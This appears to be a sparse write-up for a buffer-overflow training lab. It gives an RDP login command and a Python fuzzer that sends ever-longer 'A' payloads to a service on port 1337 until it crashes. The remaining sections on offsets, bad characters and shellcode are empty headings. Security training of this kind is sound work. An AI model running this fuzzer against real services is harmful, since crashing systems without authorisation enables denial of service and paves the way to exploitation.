Buffer Overflow Prep
$ xfreerdp /u:admin /p:password /v:MACHINE_IP /workarea /cert:ignoreScripts
Fuzzing
#! /usr/bin/python3
import socket, sys, time
ip = "IP_ADDRESS"
port = 1337
timeout = 5
prefix = b'OVERFLOW1 '
payload = [
prefix,
b'A'*100,
]
while True:
try:
s = socket.socket()
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
s.send(b''.join(payload))
print('Fuzzing with {} bytes'.format(len(payload[1])))
s.recv(1024)
s.close()
except:
print('Fuzzzing crashed at {} bytes'.format(len(payload[1])))
exit(0)
payload[1] += b'A'*100
time.sleep(1)Finding Offset & overwriting EIP
Finding Bad chars
Finding Right Module
Shell code & Shell Access
OVERFLOW 1
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 2
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 3
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 4
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 5
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 6
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 7
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 8
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 9
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
OVERFLOW 10
Fuzzing
Finding Offset & overwriting EIP
Finding Bad chars

Finding Right Module
Shell code & Shell Access
Last updated